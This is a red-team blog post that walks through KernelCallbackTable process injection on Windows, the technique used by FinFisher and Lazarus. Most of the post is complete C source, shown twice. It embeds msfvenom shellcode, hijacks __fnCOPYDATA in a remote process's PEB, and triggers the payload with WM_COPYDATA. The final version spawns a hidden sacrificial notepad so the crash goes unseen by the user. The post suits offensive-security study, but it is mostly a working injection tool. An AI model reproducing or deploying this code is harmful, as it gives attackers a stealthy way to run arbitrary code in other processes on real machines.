https://captmeelo.com/redteam/maldev/2022/04/21/kernelcallbacktable-injection.html

Adventures with KernelCallbackTable Injection

21 Apr 2022  » [redteam](https://captmeelo.com/category/redteam), 
[maldev](https://captmeelo.com/category/maldev)

Lately, I came across with KernelCallbackTable which could be abused to inject 
shellcode in a remote process. This method of process injection was used by 
[FinFisher/FinSpy](https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/)
 and 
[Lazarus](https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/).

This post walks through the journey I took and the hurdles I encountered to 
make process injection via KernelCallbackTable work according to what I wanted.

The Problems

When I Googled about this technique, the very first result that I got was none 
other than the 
[post](https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/) 
written by [modexpblog](https://twitter.com/modexpblog). So for this 
experiment, I used the 
[code](https://github.com/odzhan/injection/blob/master/kct/kct.c) he provided 
as my basis and slightly modified it.

#include <Windows.h>
#include <stdio.h>
#include "struct.h"

int

main

()

{

// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c

unsigned

char

payload

[]

=

"

\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00

"

;

SIZE_T

payloadSize

=

sizeof

(

payload

);

// Find a window for explorer.exe

HWND

hWindow

=

FindWindow

(

L"Shell_TrayWnd"

,

NULL

);

printf

(

"[+] Window Handle: 0x%p

\n

"

,

hWindow

);

// Obtain the process pid and open it

DWORD

pid

;

GetWindowThreadProcessId

(

hWindow

,

&

pid

);

printf

(

"[+] Process ID: %d

\n

"

,

pid

);

HANDLE

hProcess

=

OpenProcess

(

PROCESS_ALL_ACCESS

,

FALSE

,

pid

);

printf

(

"[+] Process Handle: 0x%p

\n

"

,

hProcess

);

// Read PEB and KernelCallBackTable addresses

PROCESS_BASIC_INFORMATION

pbi

;

pNtQueryInformationProcess

myNtQueryInformationProcess

=

(

pNtQueryInformationProcess

)

GetProcAddress

(

GetModuleHandle

(

L"ntdll.dll"

),

"NtQueryInformationProcess"

);

myNtQueryInformationProcess

(

hProcess

,

ProcessBasicInformation

,

&

pbi

,

sizeof

(

pbi

),

NULL

);

PEB

peb

;

ReadProcessMemory

(

hProcess

,

pbi

.

PebBaseAddress

,

&

peb

,

sizeof

(

peb

),

NULL

);

printf

(

"[+] PEB Address: 0x%p

\n

"

,

pbi

.

PebBaseAddress

);

KERNELCALLBACKTABLE

kct

;

ReadProcessMemory

(

hProcess

,

peb

.

KernelCallbackTable

,

&

kct

,

sizeof

(

kct

),

NULL

);

printf

(

"[+] KernelCallbackTable Address: 0x%p

\n

"

,

peb

.

KernelCallbackTable

);

// Write the payload to remote process

LPVOID

payloadAddr

=

VirtualAllocEx

(

hProcess

,

NULL

,

payloadSize

,

MEM_RESERVE

|

MEM_COMMIT

,

PAGE_EXECUTE_READWRITE

);

WriteProcessMemory

(

hProcess

,

payloadAddr

,

payload

,

payloadSize

,

NULL

);

printf

(

"[+] Payload Address: 0x%p

\n

"

,

payloadAddr

);

// 4. Write the new table to the remote process

LPVOID

newKCTAddr

=

VirtualAllocEx

(

hProcess

,

NULL

,

sizeof

(

kct

),

MEM_RESERVE

|

MEM_COMMIT

,

PAGE_READWRITE

);

kct

.

__fnCOPYDATA

=

(

ULONG_PTR

)

payloadAddr

;

WriteProcessMemory

(

hProcess

,

newKCTAddr

,

&

kct

,

sizeof

(

kct

),

NULL

);

printf

(

"[+] __fnCOPYDATA: 0x%p

\n

"

,

kct

.

__fnCOPYDATA

);

// Update the PEB

WriteProcessMemory

(

hProcess

,

(

PBYTE

)

pbi

.

PebBaseAddress

+

offsetof

(

PEB

,

KernelCallbackTable

),

&

newKCTAddr

,

sizeof

(

ULONG_PTR

),

NULL

);

printf

(

"[+] Remote process PEB updated

\n

"

);

// Trigger execution of payload

COPYDATASTRUCT

cds

;

WCHAR

msg

[]

=

L"Pwn"

;

cds

.

dwData

=

1

;

cds

.

cbData

=

lstrlen

(

msg

)

*

2

;

cds

.

lpData

=

msg

;

SendMessage

(

hWindow

,

WM_COPYDATA

,

(

WPARAM

)

hWindow

,

(

LPARAM

)

&

cds

);

printf

(

"[+] Payload executed

\n

"

);

// Restore original KernelCallbackTable

WriteProcessMemory

(

hProcess

,

(

PBYTE

)

pbi

.

PebBaseAddress

+

offsetof

(

PEB

,

KernelCallbackTable

),

&

peb

.

KernelCallbackTable

,

sizeof

(

ULONG_PTR

),

NULL

);

printf

(

"[+] Original KernelCallbackTable restored

\n

"

);

// Release memory for code and data

VirtualFreeEx

(

hProcess

,

payloadAddr

,

0

,

MEM_DECOMMIT

|

MEM_RELEASE

);

VirtualFreeEx

(

hProcess

,

newKCTAddr

,

0

,

MEM_DECOMMIT

|

MEM_RELEASE

);

// Close handles

CloseHandle

(

hWindow

);

CloseHandle

(

hProcess

);

printf

(

"[+] Cleaned up

\n

"

);

}

The above PoC uses explorer.exe as the target process. This is done using the 
FindWindow() function to get a handle to the window class Shell_TrayWnd, which 
is associated with explorer.exe. Execution of the payload begins when the 
SendMessage() function is called. This happens since __fnCOPYDATA, which points 
to the payload’s address, gets triggered when the WM_COPYDATA message is sent.

But why explorer.exe when there are other processes running on the system? 
That’s because the KernelCallbackTable that is found within the PEB only gets 
initialized when user32.dll, used by GUI processes, is loaded into the process’ 
memory. This means processes that do not load user32.dll won’t have the 
KernelCallbackTable field in the PEB.

During my experiment, the PoC didn’t work and it keeps on crashing explorer.exe 
right after updating the target process’ PEB (by executing the below line of 
code). While explorer.exe auto-restarts after the crash, the obtained window 
handle is now invalid; resulting in a failed execution of the payload when 
SendMessage() is called.

// Update the PEB

WriteProcessMemory

(

hProcess

,

(

PBYTE

)

pbi

.

PebBaseAddress

+

offsetof

(

PEB

,

KernelCallbackTable

),

&

newKCTAddr

,

sizeof

(

ULONG_PTR

),

NULL

);

[Explorer Crashed]

What if we target other GUI processes? I tried it by getting a handle to the 
window class Notepad (using the code below) and have notepad.exe run before 
executing the code.

HWND

hWindow

=

FindWindow

(

L"Notepad"

,

NULL

);

And it worked! The payload gets executed but the target process still crashed 
right after the call to SendMessage().

[Payload Executed but Target Process Crashed]

The problems I see with this method are:

- You have to first enumerate the window classes available on the system. (This 
is doable with EnumWindows() function.)
- The target process crashes no matter what. (I tried targeting different GUI 
processes and window classes but they all crashed. Although in some instances, 
the payload gets executed and in some does not.)
- The crash is visible to the user.

Other’s Solution

[ORCA666](https://twitter.com/ORCA10K) found a way to solve this issue by not 
targeting explorer.exe and by loading [user32.dll in 
memory](https://gitlab.com/ORCA666/kcthijack/-/blob/main/KCTHijack/main.c#L175).
 However, his approach loads user32.dll in the current process’ memory and the 
payload gets executed locally instead of being injected into another process. 
If you want to have a look at his approach, visit his 
[KCTHIJACK](https://gitlab.com/ORCA666/kcthijack) repo.

His solution is great but this is not what I wanted to do; that is injecting 
the payload in a remote process.

My Solution

Since crashing the remote process is inevitable, why not spawn a “sacrificial” 
process that will not be visible to the user? This is the solution that I came 
up with that goes according to what I wanted to do.

First Attempt: FAILED!

To achieve my goal, I used CreateProcess() to spawn an instance of notepad.exe 
and set the process creation flag dwFlags to CREATE_SUSPENDED to make it 
“hidden”.

CreateProcess

(

L"C:

\\

Windows

\\

System32

\\

notepad.exe"

,

NULL

,

NULL

,

NULL

,

FALSE

,

CREATE_SUSPENDED

,

NULL

,

NULL

,

&

si

,

&

pi

);

Well, that didn’t work because a suspended process does not have any window in 
it.

[Suspened Process has no Window]

No window means no handle to obtain so injection and execution of payload are 
not possible.

[

+

]

Window

Handle:

0x0000000000000000

[

+

]

Process

ID:

0

[

+

]

Process

Handle:

0x0000000000000000

[

+

]

PEB

Address:

0x0000020C2A583CC0

[

+

]

KernelCallbackTable

Address:

0x0000000000000000

[

+

]

Payload

Address:

0x0000000000000000

[

+

]

__

fnCOPYDATA:

0x0000000000000000

[

+

]

Remote

process

PEB

updated

[

+

]

Payload

executed

[

+

]

Original

KernelCallbackTable

restored

[

+

]

Cleaned

up

Second Attempt: FAILED! (again)

Instead of resorting to the CREATE_SUSPENDED flag to hide the created process, 
I used the dwFlags and wShowWindow members of the STARTUPINFO structure and set 
their values to the following:

si

.

dwFlags

=

STARTF_USESHOWWINDOW

;

si

.

wShowWindow

=

SW_HIDE

;

As for the process creation flag, I changed it from CREATE_SUSPENDED to 
CREATE_NEW_CONSOLE. I got the result that I wanted; the process is not visible 
to the user and it has a window. However, no handle was obtained so injection 
and execution of payload still did not happen.

[Created Process with Window]

Third Attempt: SUCCESS!

After some digging, the reason my second attempt failed is that I didn’t give 
the created process enough time to initialize its inputs. A Sleep() function 
will fix the issue (I tried it and it worked). However, I don’t want to wait 
until the number of seconds passed in Sleep() lapsed. I used WaitForInputIdle() 
instead so it will only wait until the process has finished its initialization.

WaitForInputIdle

(

pi

.

hProcess

,

1000

);

Here’s the final code that I came up with.

#include <Windows.h>
#include <stdio.h>
#include "struct.h"

int

main

()

{

// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c

unsigned

char

payload

[]

=

"

\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00

"

;

SIZE_T

payloadSize

=

sizeof

(

payload

);

// Create a sacrifical process

PROCESS_INFORMATION

pi

;

STARTUPINFO

si

=

{

sizeof

(

STARTUPINFO

)

};

si

.

dwFlags

=

STARTF_USESHOWWINDOW

;

si

.

wShowWindow

=

SW_HIDE

;

CreateProcess

(

L"C:

\\

Windows

\\

System32

\\

notepad.exe"

,

NULL

,

NULL

,

NULL

,

FALSE

,

CREATE_NEW_CONSOLE

,

NULL

,

NULL

,

&

si

,

&

pi

);

// Wait for process initialization

WaitForInputIdle

(

pi

.

hProcess

,

1000

);

// Find a window for explorer.exe

HWND

hWindow

=

FindWindow

(

L"Notepad"

,

NULL

);

printf

(

"[+] Window Handle: 0x%p

\n

"

,

hWindow

);

// Obtain the process pid and open it

DWORD

pid

;

GetWindowThreadProcessId

(

hWindow

,

&

pid

);

printf

(

"[+] Process ID: %d

\n

"

,

pid

);

HANDLE

hProcess

=

OpenProcess

(

PROCESS_ALL_ACCESS

,

FALSE

,

pid

);

printf

(

"[+] Process Handle: 0x%p

\n

"

,

hProcess

);

// Read PEB and KernelCallBackTable addresses

PROCESS_BASIC_INFORMATION

pbi

;

pNtQueryInformationProcess

myNtQueryInformationProcess

=

(

pNtQueryInformationProcess

)

GetProcAddress

(

GetModuleHandle

(

L"ntdll.dll"

),

"NtQueryInformationProcess"

);

myNtQueryInformationProcess

(

hProcess

,

ProcessBasicInformation

,

&

pbi

,

sizeof

(

pbi

),

NULL

);

PEB

peb

;

ReadProcessMemory

(

hProcess

,

pbi

.

PebBaseAddress

,

&

peb

,

sizeof

(

peb

),

NULL

);

printf

(

"[+] PEB Address: 0x%p

\n

"

,

pbi

.

PebBaseAddress

);

KERNELCALLBACKTABLE

kct

;

ReadProcessMemory

(

hProcess

,

peb

.

KernelCallbackTable

,

&

kct

,

sizeof

(

kct

),

NULL

);

printf

(

"[+] KernelCallbackTable Address: 0x%p

\n

"

,

peb

.

KernelCallbackTable

);

// Write the payload to remote process

LPVOID

payloadAddr

=

VirtualAllocEx

(

hProcess

,

NULL

,

payloadSize

,

MEM_RESERVE

|

MEM_COMMIT

,

PAGE_EXECUTE_READWRITE

);

WriteProcessMemory

(

hProcess

,

payloadAddr

,

payload

,

payloadSize

,

NULL

);

printf

(

"[+] Payload Address: 0x%p

\n

"

,

payloadAddr

);

// 4. Write the new table to the remote process

LPVOID

newKCTAddr

=

VirtualAllocEx

(

hProcess

,

NULL

,

sizeof

(

kct

),

MEM_RESERVE

|

MEM_COMMIT

,

PAGE_READWRITE

);

kct

.

__fnCOPYDATA

=

(

ULONG_PTR

)

payloadAddr

;

WriteProcessMemory

(

hProcess

,

newKCTAddr

,

&

kct

,

sizeof

(

kct

),

NULL

);

printf

(

"[+] __fnCOPYDATA: 0x%p

\n

"

,

kct

.

__fnCOPYDATA

);

// Update the PEB

WriteProcessMemory

(

hProcess

,

(

PBYTE

)

pbi

.

PebBaseAddress

+

offsetof

(

PEB

,

KernelCallbackTable

),

&

newKCTAddr

,

sizeof

(

ULONG_PTR

),

NULL

);

printf

(

"[+] Remote process PEB updated

\n

"

);

// Trigger execution of payload

COPYDATASTRUCT

cds

;

WCHAR

msg

[]

=

L"Pwn"

;

cds

.

dwData

=

1

;

cds

.

cbData

=

lstrlen

(

msg

)

*

2

;

cds

.

lpData

=

msg

;

SendMessage

(

hWindow

,

WM_COPYDATA

,

(

WPARAM

)

hWindow

,

(

LPARAM

)

&

cds

);

printf

(

"[+] Payload executed

\n

"

);

}

> NOTE: I already removed the cleanup code (like restoring the original 
> KernelCallbackTable) because they don’t matter anymore since the target 
> process has already crashed and exited.

> The full project can be found 
> [here](https://github.com/capt-meelo/KernelCallbackTable-Injection).

And here it is in action.

[Successful KernelCallbackTable Injection]

Conclusion

That’s it! That is how I modified the base PoC to make KernelCallbackTable 
process injection work according to what I wanted.

If anyone knows other solutions, like making the remote process not crash, I’m 
happy to hear it. :)

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